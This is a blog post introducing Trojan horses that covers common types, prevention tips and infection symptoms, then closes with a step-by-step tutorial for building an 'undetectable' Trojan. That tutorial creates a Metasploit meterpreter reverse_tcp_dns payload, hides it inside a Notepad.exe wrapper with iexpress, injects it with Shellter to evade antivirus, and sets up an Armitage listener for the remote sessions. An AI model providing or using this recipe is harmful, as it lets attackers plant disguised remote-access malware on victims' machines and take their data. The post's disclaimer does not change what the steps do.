Introduction to Trojan Horse


spyhood | Introduction to Trojan Horse


I am pretty sure you’ve come across the movie "Troy", where Brad Pitt played Achilles. Like in the movie, a Trojan Horse is much similar to the wooden horse which was used to trick the soldiers of Troy into sneaking enemy warriors in their city.


A Trojan tends to look like a safe bet but isn’t. A Trojan horse hides malware in what appears to be a normal activity. Once entered, they will be connected to the host system and begin to pull the plugs of your computer without your consent and knowledge.


The behaviour of Trojan is in default daemon. You won’t know it is present in your computer system. At least not unless you’re a pentesting pro -). There are numerous ways a Trojan horse can look like.


1)       It sometimes looks like a malicious instruction that is hidden inside a legitimate program and carries out actions that are unwarranted and are unwanted by the user.

2)      A legit software source is altered by attaching a Trojan to it. One can easily execute this file with the help of a stub, and the legit program read as a byte. Once done, the user will see the program functioning normally and will never suspect that a Trojan was also entered into their system without his consent.


Trojans, in general, are spread by some form of social engineering. A quick example is clicking on a fake advert online, or a scenario where a user is tricked into executing an email attachment camouflaged to look unsuspicious.


Trojans may in effect allow an attacker access into the user’s information like passwords, personal identity and banking information.

Some of the most common Trojans


spyhood | Introduction to Trojan Horse


Ø  Downloader Trojan: The main focus of this kind of Trojan is to download additional malware into the already infected computer.


Ø  Backdoor Trojan: This Trojan allows the attacker access to the computer by creating a “backdoor”.


Ø  Infostealer Trojan: This kind of Trojan is specifically made to steal data from the infected computer.


Ø  Remote access Trojan: A Trojan that gives the attacker full control over the computer system.


Ø  DDoS attack Trojan: Designed to carry out DDoS attacks which flood a network with traffic, thereby taking it down.


 How to keep strong and not get wrecked by a Horse


I’ve been telling you lots of stuff on Trojan Horse which might have aroused your interest or gotten you a bit worried. Get excited bruh because Trojans aren’t bulletproof. Let’s take a look at some protection techniques;

spyhood | Introduction to Trojan Horse



Ø  Always be on the lookout for new updates for your operating system’s software. It is advisable to do this as soon as such an update comes online from the software company. The reason behind this is because attackers tend to exploit security vulnerabilities in outdated software.


Ø  Run periodic scans with your software. Computer security should begin with an internet security suite. You should set it up in a way that the program runs scans automatically in regular intervals.


Ø  Stop visiting unsafe websites. This can be done with the help of internet security suites which alerts the user if the site he’s about to visit is unsafe.


Ø  Protect all your accounts with very strong, unique passwords.


Ø  Always keep your personal information safe with a firewall.


      You must be wondering "okay, how do I know that my computer is infected?"


     My answer to that is to always be on the lookout for the following;


  •        Does your PC keep talking to you? displaying annoying popups and messages telling you that   your PC is infected and in need of protection? It can also come in a form of an advert.

  •        Applications don't start. If you've ever tried to run a program from the start menu and nothing   happens, or sometimes a different program starts, then you should worry. This could be             another problem though, but it is one of the many symptoms of an infected computer.

  •       The computer is running extremely slow. This could be as a result of many things, including a Trojan.
        
  •       You find it difficult to connect to an internet or it runs extremely slow even though the guy next to you is browsing with ease.

  •       What happened to my files? Even my antivirus! 

  •      I connect to the Internet, and different windows open or the browser provides pages I did not request

  •     If your computer starts speaking a funny language. If the default language of applications changes, the screen displays back-to-front… you really check your computer because you might just have an infected system.


Mobile Apps aren't spared from Trojan


Trojans don’t just wreck laptops and desktop machines. They can also cause havoc on a mobile device. The amount of risk taken is basically the same, except that before completing an installation on an Android app, you’ll get a giant list of all the stuff you’re giving the application access to.



The major difference between a computer and an Android phone is that it’s pretty easier to get updates and choose anti-virus protection on pc, while you have to rely solely on Google to do the work.


Computer protection is constantly being improved, while mobile protection still lives a huge gap.

You should, however, note that if a Trojan is being executed in a restrictive environment like in a case of a non-root user in a UNIX system, the Trojan will most likely not function properly(though it can still pose some great threat). But in a scenario where it is executed in a windows environment, the Trojan will be able to carry out all its functionality because the windows security is more vulnerable than the Unix.



How do Hackers create an undetectable Trojan Horse?


There'll be no point to this introduction if I don't show an example of how hackers develop Trojans. There isn't a specific rule or method. Each hacker does whatever works for him, and i'm gonna share what works here. Quite basic actually.

However, you should note that in no way is Spyhood responsible for the actions you perform with this piece of knowledge. Check the disclaimer page for more info on that.

First, let's look at the list of things you'll be needing in order to perform this task;








  • Windows
  • Kali Linux
  • A No IP account with a domain name
  • Shellter
  • A forwarded port on your router
Now let's dive in 👇to the steps

spyhood | Introduction to Trojan Horse



First step; create the DNS payload using Kali Linux


  • Open Metasploit on Kali Linux by typing msfconsole in a terminal.

  • Type use payload/windows/meterpreter/reverse_tcp_dns.

  • Type show options. You will be prompted to set your lhost and lport.

  • Type set lhost (hostname you created, without http://).

  • Type set lport (port you forwarded on your router set for the Linux machine).

  • Type generate -h to display all options for generating the payload.

  • Type generate -f (file title you chose for the payload) -p windows -t raw. Example; generate -f DNS -p windows -t raw

  • Exit the terminal and click on Files.

  • Transfer the created payload to Windows. (Be aware that your AV might detect it at its current state).


Second step; create the executable file on Windows


  • For 32-bit Windows - Navigate to C:\Windows\System32\iexpress.exe (Right click and select run as administrator). For 64-bit Windows - Navigate to C:\Windows\SysWOW64\iexpress.exe (select run as administrator)

  • Select Create new Self Extraction Directive File.

  • Click next on the Package Purpose page.

  • Name the package.  Ex: Notepad.exe

  • No Prompt, click next.

  • Do not display a license.

  • Click Add and select any file on your computer. Choose Notepad.exe in the C:\Windows\System32 folder.

  • Click the drop arrow and select the file name you choose on the last screen.

  • Choose Hidden and then click next.

  • No Message. Click Next

  • Click Browse to create a title for your malware file. Then choose a destination path. Check the Hide File Extracting Progress Animation from user.

  • Select No restart.

  • You can either choose to save the self-extraction or not.

  • Click Next on the create Package. Then Finish.


Third step; use both created files in shellter to create Trojan Horse



  • Open the Shellter folder. Right click on Shellter.exe and run as Administrator.

  • Type A for Auto.

  • Type N for No.

  • Type the location of the EXE file you created from the second step and hit enter. Let Shellter do its thing for a minute.

  • Type C for custom when asked to choose payload, 

  • Type the location of the payload you created in the first step and hit enter.

  • Type N for No reflective DLL loader.

  • Press enter to allow Shellter do its thing. You should have a working undetectable Trojan Horse If it says Injection Verified!

  • Press enter to exit Shellter.

The final step; set your listener


I'm gonna use Armitage for this tutorial.



  • Go back to Kali Linux.

  • Open the Terminal and type Msfupdate.

  • Type apt-get install armitage.

  • Type msfdb init.

  • Open Armitage.

  • Click Connect.

  • Click Yes.

  • When Armitage opens, type: use exploit/multi/handler

  • Type set lhost 0.0.0.0

  • Type set lport (the exact port you forwarded in your router)

  • Type set payload windows/meterpreter/reverse tcp dns

  • Type set exitonsession false

  • (Optional.) Type set autorunscript migrate -f

  • (Optional.) Type set prependmigrate True

  • Type exploit -j

Optional steps are used in order to migrate the entire process automatically so the session does not end before you get the chance to do it manually.



Your Trojan Horse is ready. Don't forget to check my disclaimer page to check out the part Spyhood plays in all this. Also, connect with me on Facebook if you will.





Subscribe to my mailing list

* indicates required

0 comments:

Post a Comment